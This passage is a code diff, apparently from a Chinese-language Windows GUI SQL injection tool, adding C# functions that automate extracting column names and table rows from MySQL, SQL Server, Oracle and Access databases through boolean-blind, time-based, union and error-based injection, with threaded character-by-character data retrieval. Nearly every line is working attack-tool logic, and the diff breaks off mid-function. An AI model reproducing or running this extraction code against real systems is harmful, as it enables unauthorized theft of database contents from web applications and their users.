+ String unicode_data_payload = MSSQL.unicode_value.Replace("{index}", i + "").Replace("{data}", data_payload);
+ //取unicode转换后的长度
+ String unicode_data_len_payload = MSSQL.bool_length.Replace("{data}", unicode_data_payload);
+
+ //长度范围2-8支持大部分语言
+ int unicode_data_len = getValue(unicode_data_len_payload, 1, 8);
+ int m_index = 1;
+ StringBuilder unicodes = new StringBuilder();
+ while (m_index <= unicode_data_len)
+ {
+ //获取多字节
+ String substr_payload = MSSQL.substr.Replace("{data}", unicode_data_payload).Replace("{index}", m_index.ToString());
+ //单个unicode值范围是0-9
+ int unicode = getValue(MSSQL.bool_value.Replace("{data}", substr_payload), 0, 9);
+ unicodes.Append(unicode.ToString());
+ m_index++;
+ }
+
+ if (Tools.convertToInt(unicodes.ToString()) > 255)
+ {
+ value += Tools.unHexByUnicode(int.Parse(unicodes.ToString()), config.db_encoding);
+ }
+ else
+ {
+ value += (char)Tools.convertToInt(unicodes.ToString());
+ }
+ }
+ this.Invoke(new StringDelegate(log), "表" + sn.tableName + "发现列:" + value);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, value, "column");
+
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ }
+
+
+ ///
+ /// 获取列明称,bool方式
+ ///
+ /// 表的节点
+ public void getColumnNameByBoolByOracle(Object osn)
+ {
+
+ try
+ {
+ SelectNode sn = (SelectNode)osn;
+ //判断当前表长度
+ String data_payload = Oracle.column_value.Replace("{table}", sn.tableName).Replace("{index}", sn.limit + "").Replace("{dbname}", sn.dbname);
+ int len = getValue(Oracle.bool_length.Replace("{data}", data_payload), 1, 50);
+
+ //判断当前数据库对应的ascii码
+ String va_payload = Oracle.bool_value.Replace("{data}", data_payload);
+ String value = "";
+ //获取值
+ for (int i = 1; i <= len; i++)
+ {
+ //取值payload,替换对应下标值
+ String tmp_va_payload = va_payload.Replace("{index}", i + "");
+ int ascii = getValue(tmp_va_payload, 0, 128);
+ value += ((char)ascii).ToString();
+ }
+ this.Invoke(new StringDelegate(log), "表" + sn.tableName + "发现列:" + value);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, value, "column");
+
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ }
+
+ ///
+ /// 获取列名,union MySQL
+ ///
+ ///
+ public void getColumnNameByUnionByMySQL(Object osn)
+ {
+ try
+ {
+ SelectNode sn = (SelectNode)osn;
+ //获取数据库数量
+ List data_list = new List();
+ data_list.Add(MySQL5.column_value.Replace("{index}", sn.limit.ToString()).Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")).Replace("'{table}'", Tools.strToHex(sn.tableName, "UTF-8")));
+ String column_Name_data = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, "1", data_list, null, null, -1);
+ String result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", column_Name_data));
+ this.Invoke(new StringDelegate(log), "发现列:" + result);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "column");
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取数据库名称时发生异常:" + e.Message);
+ }
+ }
+
+ ///
+ /// 获取列名,union MySQL
+ ///
+ ///
+ public void getColumnNameByUnionBySQLServer(Object osn)
+ {
+ try
+ {
+ SelectNode sn = (SelectNode)osn;
+
+ String column_Name_data = MSSQL.getUnionDataValue(config.columnsCount, config.showColumn, 1, MSSQL.column_value, sn.dbname, sn.tableName, sn.limit.ToString());
+ String result = getOneDataByUnionOrError(column_Name_data);
+ this.Invoke(new StringDelegate(log), "发现列:" + result);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "column");
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取数据库名称时发生异常:" + e.Message);
+ }
+ }
+
+
+ ///
+ /// 获取列名,union oracle
+ ///
+ ///
+ public void getColumnNameByUnionByOracle(Object osn)
+ {
+ try
+ {
+ SelectNode sn = (SelectNode)osn;
+
+ String column_Name_data = Oracle.getUnionDataValue(config.columnsCount, config.showColumn, Oracle.column_value, sn.dbname, sn.tableName, sn.limit.ToString());
+ String result = getOneDataByUnionOrError(column_Name_data);
+ this.Invoke(new StringDelegate(log), "发现列:" + result);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "column");
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取列名时发生异常:" + e.Message);
+ }
+ }
+
+
+ public void getColumnNameByErrorByMySQL(Object osn)
+ {
+ try
+ {
+ SelectNode sn = (SelectNode)osn;
+ //获取数据库数量
+ List data_list = new List();
+ data_list.Add(MySQL5.column_value.Replace("{index}", sn.limit.ToString()).Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")).Replace("'{table}'", Tools.strToHex(sn.tableName, "UTF-8")));
+ String column_Name_data = MySQL5.creatMySQLColumnsStrByError(data_list, null, null, -1);
+ String result = getOneDataByUnionOrError(MySQL5.error_value.Replace("{data}", column_Name_data));
+ this.Invoke(new StringDelegate(log), "发现列:" + result);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "column");
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取数据库名称时发生异常:" + e.Message);
+ }
+ }
+
+ public void getColumnNameByErrorBySQLServer(Object osn)
+ {
+ try
+ {
+ SelectNode sn = (SelectNode)osn;
+ String result = getOneDataByUnionOrError(MSSQL.error_value.Replace("{data}", MSSQL.column_value.Replace("{index}", sn.limit.ToString()).Replace("{dbname}", sn.dbname).Replace("{table}", sn.tableName)));
+ this.Invoke(new StringDelegate(log), "发现列:" + result);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "column");
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取数据库名称时发生异常:" + e.Message);
+ }
+ }
+
+ public void getColumnNameByErrorByOracle(Object osn)
+ {
+ try
+ {
+ SelectNode sn = (SelectNode)osn;
+ String result = getOneHexDataByUnionOrError(Oracle.getErrorDataValue(Oracle.column_value, sn.dbname, sn.tableName, sn.limit.ToString()));
+ this.Invoke(new StringDelegate(log), "发现列:" + result);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "column");
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取数据库名称时发生异常:" + e.Message);
+ }
+ }
+
+ ///
+ /// 获取表下面的列
+ ///
+ /// 数据库类型
+ public void getColumnsByBool(DBType dbType)
+ {
+
+ foreach (TreeNode tn in this.data_tvw_dbs.Nodes)
+ {
+ foreach (TreeNode ctn in tn.Nodes)
+ {
+ if (ctn.Checked && "table".Equals(ctn.Tag))
+ {
+ ctn.Nodes.Clear();
+
+ String dbName = ctn.Parent.Text;
+ String tableName = ctn.Text;
+ int columns_count = 0;
+ switch (dbType)
+ {
+
+ case DBType.Access:
+ checkColumnsDic(ctn);
+ break;
+ case DBType.MySQL4:
+
+ break;
+ case DBType.MySQL5:
+
+ if (KeyType.Time.Equals(config.keyType))
+ {
+ columns_count = getValueByStepUp(MySQL5.getBoolCountBySleep(MySQL5.columns_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8")).Replace("'{table}'", Tools.strToHex(tableName, "UTF-8")), config.maxTime), 0, 20);
+ }
+ else
+ {
+ columns_count = getValueByStepUp(MySQL5.bool_columns_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8")).Replace("'{table}'", Tools.strToHex(tableName, "UTF-8")), 0, 20);
+ }
+
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + tableName + "发现" + columns_count + "个列!");
+ for (int i = 0; i < columns_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = ctn;
+ sn.limit = i;
+ sn.tableName = tableName;
+ sn.dbname = dbName;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getColumnNameByBoolByMySQL), sn);
+ }
+ break;
+ case DBType.SQLServer:
+ columns_count = getValueByStepUp(MSSQL.bool_columns_count.Replace("{dbname}", dbName).Replace("{table}", tableName), 0, 20);
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + tableName + "发现" + columns_count + "个列!");
+ for (int i = 0; i < columns_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = ctn;
+ sn.limit = i;
+ sn.tableName = tableName;
+ sn.dbname = dbName;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getColumnNameByBoolBySQLServer), sn);
+ }
+ break;
+ case DBType.Oracle:
+ columns_count = getValueByStepUp(Oracle.bool_columns_count.Replace("{dbname}", dbName).Replace("{table}", tableName), 0, 20);
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + tableName + "发现" + columns_count + "个列!");
+ for (int i = 1; i <= columns_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = ctn;
+ sn.limit = i;
+ sn.tableName = tableName;
+ sn.dbname = dbName;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getColumnNameByBoolByOracle), sn);
+ }
+ break;
+ }
+
+ }
+ }
+ }
+
+ }
+
+ ///
+ /// 获取表下面的列
+ ///
+ /// 数据库类型
+ public void getColumnsByUnion(DBType dbType)
+ {
+
+ foreach (TreeNode tn in this.data_tvw_dbs.Nodes)
+ {
+ foreach (TreeNode ctn in tn.Nodes)
+ {
+ if (ctn.Checked && "table".Equals(ctn.Tag))
+ {
+ ctn.Nodes.Clear();
+ String dbName = ctn.Parent.Text;
+ String tableName = ctn.Text;
+ List data_list = new List();
+ String columns_count_payload = "";
+ String result = "";
+ int columns_count = 0;
+ switch (dbType)
+ {
+
+ case DBType.Access:
+ checkColumnsDic(ctn);
+ break;
+ case DBType.MySQL4:
+
+ break;
+ case DBType.MySQL5:
+ data_list.Add(MySQL5.columns_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8")).Replace("'{table}'", Tools.strToHex(tableName, "UTF-8")));
+ columns_count_payload = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, "1", data_list, null, null, -1);
+ result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", columns_count_payload));
+
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + tableName + "有" + Tools.convertToInt(result) + "个列!");
+ columns_count = Tools.convertToInt(result);
+ for (int i = 0; i < columns_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = ctn;
+ sn.limit = i;
+ sn.tableName = tableName;
+ sn.dbname = dbName;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getColumnNameByUnionByMySQL), sn);
+ }
+ break;
+ case DBType.SQLServer:
+ columns_count_payload = MSSQL.getUnionDataValue(config.columnsCount, config.showColumn, 1, MSSQL.columns_count, dbName, tableName, "");
+ result = getOneDataByUnionOrError(columns_count_payload);
+
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + tableName + "有" + Tools.convertToInt(result) + "个列!");
+ columns_count = Tools.convertToInt(result);
+ for (int i = 0; i < columns_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = ctn;
+ sn.limit = i;
+ sn.tableName = tableName;
+ sn.dbname = dbName;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getColumnNameByUnionBySQLServer), sn);
+ }
+ break;
+ case DBType.Oracle:
+ columns_count_payload = Oracle.getUnionDataValue(config.columnsCount, config.showColumn, Oracle.columns_count, dbName, tableName, "");
+ result = getOneDataByUnionOrError(columns_count_payload);
+
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + tableName + "有" + Tools.convertToInt(result) + "个列!");
+ columns_count = Tools.convertToInt(result);
+ for (int i = 1; i <= columns_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = ctn;
+ sn.limit = i;
+ sn.tableName = tableName;
+ sn.dbname = dbName;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getColumnNameByUnionByOracle), sn);
+ }
+ break;
+ }
+
+ }
+ }
+ }
+
+ }
+
+
+ ///
+ /// 获取表下面的列
+ ///
+ /// 数据库类型
+ public void getColumnsByError(DBType dbType)
+ {
+ foreach (TreeNode tn in this.data_tvw_dbs.Nodes)
+ {
+ foreach (TreeNode ctn in tn.Nodes)
+ {
+ if (ctn.Checked && "table".Equals(ctn.Tag))
+ {
+ ctn.Nodes.Clear();
+ String dbName = ctn.Parent.Text;
+ String tableName = ctn.Text;
+ List data_list = new List();
+ String columns_count_payload = "";
+ String result = "";
+ int columns_count = 0;
+ switch (dbType)
+ {
+ case DBType.Access:
+ MessageBox.Show("抱歉Access数据库,不支持错误显示注入!");
+ break;
+ case DBType.MySQL4:
+ MessageBox.Show("抱歉MySQL4数据库,不支持错误显示注入!");
+ break;
+ case DBType.MySQL5:
+
+ data_list.Add(MySQL5.columns_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8")).Replace("'{table}'", Tools.strToHex(tableName, "UTF-8")));
+ columns_count_payload = MySQL5.creatMySQLColumnsStrByError(data_list, null, null, -1);
+ result = getOneDataByUnionOrError(MySQL5.error_value.Replace("{data}", columns_count_payload));
+
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + tableName + "有" + Tools.convertToInt(result) + "个列!");
+ columns_count = Tools.convertToInt(result);
+ for (int i = 0; i < columns_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = ctn;
+ sn.limit = i;
+ sn.tableName = tableName;
+ sn.dbname = dbName;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getColumnNameByErrorByMySQL), sn);
+ }
+ break;
+ case DBType.SQLServer:
+ result = getOneDataByUnionOrError(MSSQL.error_value.Replace("{data}", MSSQL.columns_count.Replace("{dbname}", dbName).Replace("{table}", tableName)));
+ //HTML解码
+ result = HttpUtility.HtmlDecode(result);
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + tableName + "有" + Tools.convertToInt(result) + "个列!");
+ columns_count = Tools.convertToInt(result);
+ for (int i = 0; i < columns_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = ctn;
+ sn.limit = i;
+ sn.tableName = tableName;
+ sn.dbname = dbName;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getColumnNameByErrorBySQLServer), sn);
+ }
+ break;
+ case DBType.Oracle:
+ result = getOneHexDataByUnionOrError(Oracle.getErrorDataValue(Oracle.columns_count, dbName, tableName, ""));
+
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + tableName + "有" + Tools.convertToInt(result) + "个列!");
+ columns_count = Tools.convertToInt(result);
+ for (int i = 1; i <= columns_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = ctn;
+ sn.limit = i;
+ sn.tableName = tableName;
+ sn.dbname = dbName;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getColumnNameByErrorByOracle), sn);
+ }
+ break;
+ }
+
+ }
+ }
+ }
+
+ }
+ private void getColumns()
+ {
+ if (checkConfig())
+ {
+ if (isSetInjectPoint())
+ {
+ switch (config.injectType)
+ {
+ case InjectType.Bool:
+ getColumnsByBool(config.dbType);
+ break;
+ case InjectType.Union:
+ getColumnsByUnion(config.dbType);
+ break;
+ case InjectType.Error:
+ getColumnsByError(config.dbType);
+ break;
+ case InjectType.Sleep:
+ getDBSByBool(config.dbType);
+ break;
+
+ }
+ }
+ else
+ {
+ MessageBox.Show("未标记注入点,请标记!");
+ }
+ }
+ else
+ {
+ MessageBox.Show("注入配置错误,请检查!");
+ }
+ }
+ private void data_dbs_tsl_getColumns_Click(object sender, EventArgs e)
+ {
+
+ if (MyThreadPool.GetAliveThreadsCount() == 0)
+ {
+ status = 1;
+ this.currentThread = new Thread(getColumns);
+ this.currentThread.Start();
+ }
+ else
+ {
+
+ MessageBox.Show("还有线程未结束,请稍候....");
+ }
+
+ }
+
+ ///
+ /// 获取数据
+ ///
+ /// 列名集合List及limit等参数
+ public void getDataValueByBoolByMySQL(Object opam)
+ {
+ try
+ {
+
+ GetDataPam gp = (GetDataPam)opam;
+
+ String data_payload = MySQL5.data_value.Replace("{dbname}", gp.dbname).Replace("{table}", gp.table).Replace("{limit}", gp.limit + "");
+
+ ListViewItem lvi = null;
+
+ foreach (String columnName in gp.columns)
+ {
+ //取每一列的值
+
+ String payload_len = MySQL5.ver_length.Replace("{data}", data_payload).Replace("{columns}", columnName);
+
+ if (config.keyType.Equals(KeyType.Time))
+ {
+ payload_len = MySQL5.getBoolCountBySleep(MySQL5.bool_length.Replace("{data}", data_payload).Replace("{columns}", columnName), config.maxTime);
+ }
+ int len = getValueByStepUp(payload_len, 0, 50);
+
+
+ String va_payload = MySQL5.ver_value.Replace("{data}", data_payload).Replace("{columns}", columnName);
+ String value = "";
+ //获取值
+ for (int i = 1; i <= len; i++)
+ {
+ String tmp_va_payload = MySQL5.mu_value.Replace("{data}", data_payload).Replace("{index}", i + "").Replace("{columns}", columnName);
+ String plen = "";
+ //是否判断多字节字符
+ Boolean pLen_isMax = false;
+ if (config.isMuStr)
+ {
+ //开启多字节判断
+ //转换对应值判断是否多字节字符
+ plen = MySQL5.ver_length.Replace("{data}", tmp_va_payload);
+ if (config.keyType.Equals(KeyType.Time))
+ {
+ plen = MySQL5.getBoolCountBySleep(MySQL5.bool_length.Replace("{data}", tmp_va_payload), config.maxTime);
+ }
+ pLen_isMax = findKeyInBody(plen, 2);
+ }
+
+ //取值payload,替换对应下标值
+
+ //多字节字符
+ if (pLen_isMax)
+ {
+ //MySQL采用hex
+ int mu_payload_len = getValue(plen, 2, 8);
+ int m_index = 1;
+ String[] ver_tmp = new String[mu_payload_len];
+ while (m_index <= mu_payload_len)
+ {
+ //获取多字节
+ int ascii = 0;
+ if (config.keyType.Equals(KeyType.Time))
+ {
+ getValue(MySQL5.getBoolCountBySleep(MySQL5.bool_value.Replace("{data}", tmp_va_payload).Replace("{index}", m_index + ""), config.maxTime), 0, 128);
+ }
+ else
+ {
+ getValue(MySQL5.ver_value.Replace("{data}", tmp_va_payload).Replace("{index}", m_index + ""), 0, 128);
+ }
+ ver_tmp[m_index - 1] = ((char)ascii).ToString();
+ m_index++;
+ }
+ //设置值,这里由于是hex值,需要转换
+ value += Tools.unHex(Tools.convertToString(ver_tmp), config.db_encoding);
+ }
+ //单字节字符
+ else
+ {
+ String payload = MySQL5.ver_value.Replace("{data}", data_payload).Replace("{columns}", columnName).Replace("{index}", i + "");
+ if (config.keyType.Equals(KeyType.Time))
+ {
+ payload = MySQL5.getBoolCountBySleep(MySQL5.bool_value.Replace("{data}", data_payload).Replace("{columns}", columnName).Replace("{index}", i + ""), config.maxTime);
+ }
+
+ int ascii = getValue(payload, 0, 255);
+
+ value += ((char)ascii).ToString();
+ }
+ }
+ if (lvi == null)
+ {
+ lvi = new ListViewItem(value);
+ }
+ else
+ {
+ lvi.SubItems.Add(value);
+ }
+
+ }
+ this.Invoke(new addItemToListViewDelegate(addItemToListView), lvi);
+ this.Invoke(new StringDelegate(log), "获取到第" + (gp.limit + 1) + "行的值!");
+
+ }
+ catch (Exception e)
+ {
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ }
+
+
+ ///
+ /// 获取数据
+ ///
+ /// 列名集合List及limit等参数
+ public void getDataValueByBoolBySQLServer(Object opam)
+ {
+ try
+ {
+
+ GetDataPam gp = (GetDataPam)opam;
+
+ ListViewItem lvi = null;
+
+ foreach (String columnName in gp.columns)
+ {
+ //取每一列的值
+ String data_payload = MSSQL.getBoolDataPayLoad(columnName, gp.columns, gp.dbname, gp.table, gp.limit);
+ String payload_len = MSSQL.bool_length.Replace("{data}", data_payload).Replace("{columns}", columnName);
+
+ int len = getValueByStepUp(payload_len, 0, 50);
+
+ String value = "";
+ //获取值
+ for (int i = 1; i <= len; i++)
+ {
+ //取值payload,替换对应下标值
+ //select UNICODE(substring(@@version,{index},1))
+ //取值payload,替换对应下标值
+ String unicode_data_payload = MSSQL.unicode_value.Replace("{index}", i + "").Replace("{data}", data_payload);
+ //取unicode转换后的长度
+ String unicode_data_len_payload = MSSQL.bool_length.Replace("{data}", unicode_data_payload);
+
+ //长度范围2-8支持大部分语言
+ int unicode_data_len = getValue(unicode_data_len_payload, 1, 8);
+ int m_index = 1;
+ StringBuilder unicodes = new StringBuilder();
+ while (m_index <= unicode_data_len)
+ {
+ //获取多字节
+ String substr_payload = MSSQL.substr.Replace("{data}", unicode_data_payload).Replace("{index}", m_index.ToString());
+ //单个unicode值范围是0-9
+ int unicode = getValue(MSSQL.bool_value.Replace("{data}", substr_payload), 0, 9);
+ unicodes.Append(unicode.ToString());
+ m_index++;
+ }
+
+ if (Tools.convertToInt(unicodes.ToString()) > 255)
+ {
+ value += Tools.unHexByUnicode(int.Parse(unicodes.ToString()), config.db_encoding);
+ }
+ else
+ {
+ value += (char)Tools.convertToInt(unicodes.ToString());
+ }
+ }
+ if (lvi == null)
+ {
+ lvi = new ListViewItem(value);
+ }
+ else
+ {
+ lvi.SubItems.Add(value);
+ }
+
+ }
+ this.Invoke(new addItemToListViewDelegate(addItemToListView), lvi);
+ this.Invoke(new StringDelegate(log), "获取到第" + gp.limit + "行的值!");
+
+ }
+ catch (Exception e)
+ {
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ }
+
+
+
+ ///
+ /// 获取数据
+ ///
+ /// 列名集合List及limit等参数
+ public void getDataValueByBoolByAccess(Object opam)
+ {
+ try
+ {
+
+ GetDataPam gp = (GetDataPam)opam;
+
+ ListViewItem lvi = null;
+
+ foreach (String columnName in gp.columns)
+ {
+ //取每一列的值
+ String data_payload = Access.getBoolDataPayLoad(columnName, gp.columns, gp.dbname, gp.table, gp.limit);
+ String payload_len = Access.bool_length.Replace("{data}", data_payload).Replace("{columns}", columnName);
+
+ int len = getValueByStepUp(payload_len, 0, 50);
+
+ String value = "";
+ //获取值
+ for (int i = 1; i <= len; i++)
+ {
+ //asc有可能为负数,需要用65536减去这个数
+ String unicode_data_payload = Access.unicode_value.Replace("{index}", i + "").Replace("{data}", data_payload);
+ //取unicode转换后的长度
+ String unicode_data_len_payload = Access.bool_length.Replace("{data}", unicode_data_payload);
+
+ //长度范围2-8支持大部分语言
+ int unicode_data_len = getValue(unicode_data_len_payload, 1, 8);
+ int m_index = 1;
+ StringBuilder unicodes = new StringBuilder();
+ while (m_index <= unicode_data_len)
+ {
+ //获取多字节
+ String substr_payload = Access.substr.Replace("{data}", unicode_data_payload).Replace("{index}", m_index.ToString());
+ //单个unicode值范围是0-9
+ int unicode = getValue(Access.bool_value.Replace("{data}", substr_payload), 0, 9);
+ unicodes.Append(unicode.ToString());
+ m_index++;
+ }
+ if (unicodes.ToString().StartsWith("0") && unicodes.Length > 1)
+ {
+ unicodes.Remove(0, 1);
+ unicodes.Insert(0, "-");
+ }
+
+
+ int strnum = Tools.convertToInt(unicodes.ToString());
+ if (strnum < 0)
+ {
+ strnum = 65536 + strnum;
+
+ }
+ value += Tools.unHexByUnicode(strnum, config.db_encoding);
+ }
+ if (lvi == null)
+ {
+ lvi = new ListViewItem(value);
+ }
+ else
+ {
+ lvi.SubItems.Add(value);
+ }
+
+ }
+ this.Invoke(new addItemToListViewDelegate(addItemToListView), lvi);
+ this.Invoke(new StringDelegate(log), "获取到第" + gp.limit + "行的值!");
+
+ }
+ catch (Exception e)
+ {
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ }
+
+ ///
+ /// 获取数据
+ ///
+ /// 列名集合List及limit等参数
+ public void getDataValueByBoolByOracle(Object opam)
+ {
+ try
+ {
+
+ GetDataPam gp = (GetDataPam)opam;
+
+ ListViewItem lvi = null;
+
+ foreach (String columnName in gp.columns)
+ {
+ //取每一列的值
+ String data_payload = Oracle.getBoolDataPayLoad(columnName, gp.columns[0], gp.dbname, gp.table, gp.limit);
+ String payload_len = Oracle.bool_length.Replace("{data}", data_payload).Replace("{column}", columnName);
+
+ int len = getValueByStepUp(payload_len, 0, 50);
+
+ String value = "";
+ //获取值
+ for (int i = 1; i <= len; i++)
+ {
+ //取值payload,替换对应下标值
+ //select UNICODE(substring(@@version,{index},1))
+ //取值payload,替换对应下标值
+ String hex_data_payload = Oracle.hex_value.Replace("{index}", i + "").Replace("{data}", data_payload);
+ //取unicode转换后的长度
+ String hex_data_len_payload = Oracle.bool_length.Replace("{data}", hex_data_payload);
+
+ //长度范围2-8支持大部分语言
+ int unicode_data_len = getValue(hex_data_len_payload, 1, 8);
+ int m_index = 1;
+ StringBuilder hexs = new StringBuilder();
+ while (m_index <= unicode_data_len)
+ {
+ //获取多字节
+ String substr_payload = Oracle.bool_value.Replace("{data}", hex_data_payload).Replace("{index}", m_index.ToString());
+ //单个unicode值范围是0-9
+ int ascii = getValue(substr_payload, 0, 255);
+ hexs.Append((char)ascii);
+ m_index++;
+ }
+ value += Tools.hexToRaw(hexs.ToString(), config.db_encoding);
+
+ }
+ if (lvi == null)
+ {
+ lvi = new ListViewItem(value);
+ }
+ else
+ {
+ lvi.SubItems.Add(value);
+ }
+
+ }
+ this.Invoke(new addItemToListViewDelegate(addItemToListView), lvi);
+ this.Invoke(new StringDelegate(log), "获取到第" + gp.limit + "行的值!");
+
+ }
+ catch (Exception e)
+ {
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ }
+
+ ///
+ /// 获取数据,union方式
+ ///
+ /// 列名集合List及limit等参数
+ public void getDataValueByUnionByMySQL(Object opam)
+ {
+ try
+ {
+
+ GetDataPam gp = (GetDataPam)opam;
+ String datas_value_payload = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, "1", gp.columns, gp.table, gp.dbname, gp.limit);
+ String result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", datas_value_payload));
+
+ this.Invoke(new StringDelegate(log), "报告大侠,获取到第" + (gp.limit + 1) + "行数据");
+ String[] datas = Regex.Split(result, "\\$\\$\\$");
+ addItemToListView(datas);
+
+ }
+ catch (Exception e)
+ {
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ }
+
+
+ ///
+ /// 获取数据,union方式
+ ///
+ /// 列名集合List及limit等参数
+ public void getDataValueByUnionBySQLServer(Object opam)
+ {
+ try
+ {
+ GetDataPam gp = (GetDataPam)opam;
+ ListViewItem lvi = new ListViewItem();
+ String result = getOneDataByUnionOrError(MSSQL.getUnionDataValue(config.columnsCount, config.showColumn, 1, gp.dbname, gp.table, gp.columns, gp.limit));
+ this.Invoke(new addItemToListViewByColumnsDelegate(addItemToListViewByColumns), result);
+ this.Invoke(new StringDelegate(log), "获取到第" + gp.limit + "行的值!");
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ }
+
+ ///
+ /// 获取数据,union方式
+ ///
+ /// 列名集合List及limit等参数
+ public void getDataValueByUnionByAccess(Object opam)
+ {
+ try
+ {
+ GetDataPam gp = (GetDataPam)opam;
+ ListViewItem lvi = new ListViewItem();
+ String result = getOneDataByUnionOrError(Access.getUnionDataValue(config.columnsCount, config.showColumn, gp.columns, gp.table, gp.limit.ToString()).Replace("{table}", this.curren_table));
+ this.Invoke(new addItemToListViewByColumnsDelegate(addItemToListViewByColumns), result);
+ this.Invoke(new StringDelegate(log), "获取到第" + gp.limit + "行的值!");
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ }
+
+ ///
+ /// 获取数据,union方式
+ ///
+ /// 列名集合List及limit等参数
+ public void getDataValueByUnionByOracle(Object opam)
+ {
+ try
+ {
+ GetDataPam gp = (GetDataPam)opam;
+ ListViewItem lvi = new ListViewItem();
+ String result = getOneDataByUnionOrError(Oracle.getUnionDataValue(config.columnsCount, config.showColumn, gp.columns, gp.dbname, gp.table, gp.limit.ToString()));
+ this.Invoke(new addItemToListViewByColumnsDelegate(addItemToListViewByColumns), result);
+ this.Invoke(new StringDelegate(log), "获取到第" + gp.limit + "行的值!");
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ }
+
+ public void addItemToListView(String[] columnsValue)
+ {
+
+ ListViewItem lvi = null;
+ foreach (String d in columnsValue)
+ {
+ if (lvi == null)
+ {
+ lvi = new ListViewItem(d);
+ }
+ else
+ {
+ lvi.SubItems.Add(d);
+ }
+ }
+ if (lvi != null)
+ {
+ this.Invoke(new addItemToListViewDelegate(addItemToListView), lvi);
+ }
+ }
+
+ ///
+ /// 获取数据MySQL,error方式,这个长度有限,需要判断是否大于错误消息的长度限制是64个
+ ///
+ /// 列名集合List及limit等参数
+ public void getDataValueByErrorByMySQL(Object opam)
+ {
+ try
+ {
+ GetDataPam gp = (GetDataPam)opam;
+
+ ListViewItem lvi = null;
+ foreach (String column in gp.columns)
+ {
+ //获取数据长度
+
+ String datas_payload_columns = MySQL5.creatMySQLColumnStr(column);
+ String datas_payload_length = MySQL5.char_length.Replace("{data}", "(select " + datas_payload_columns + " from " + gp.dbname + "." + gp.table + " limit " + gp.limit + ",1)");
+
+ String d_l_e = MySQL5.creatMySQLColumnStr("(" + datas_payload_length + ")");
+ String datas_payload_length_error = MySQL5.error_value.Replace("{data}", d_l_e);
+
+ String result_length = getOneDataByUnionOrError(datas_payload_length_error);
+
+ int sumlen = Tools.convertToInt(result_length);
+ String datas_value_payload = "(select " + MySQL5.creatMySQLColumnsStrByError(column, gp.table, gp.dbname, gp.limit) + ")";
+ String result = "";
